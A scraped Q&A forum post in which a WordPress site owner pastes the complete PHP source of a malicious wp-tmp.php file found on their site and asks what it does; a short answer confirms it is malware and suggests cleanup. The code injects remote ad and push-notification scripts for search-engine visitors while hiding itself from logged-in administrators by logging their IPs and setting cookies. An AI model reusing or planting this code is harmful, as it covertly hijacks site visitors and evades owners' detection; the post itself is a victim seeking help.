Skip to content
Advertisement

What can do Virus wp-tmp.php on WordPress

I found this virus on My WordPress on wp-includes/ Files that has scan by siteguarding.com and other and found bad scripts ad

this content file “wp-tmp.php” :

ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 





}

What was this file doing? And how is know that file is insert on my website file root ? I have chating with siteguarding.com support and tell me “Your website is hacked” wp-includes/wp-tmp.php – 100% virus up/includes/functions.php – 100% virus you are in blacklist

Advertisement

Answer

It’s malware, definitely this file is not part WP. Remove the file, edit your folder permisions, search your files for other malicious code. Update WP and your plugins.

User contributions licensed under: CC BY-SA
4 People found this is helpful
Advertisement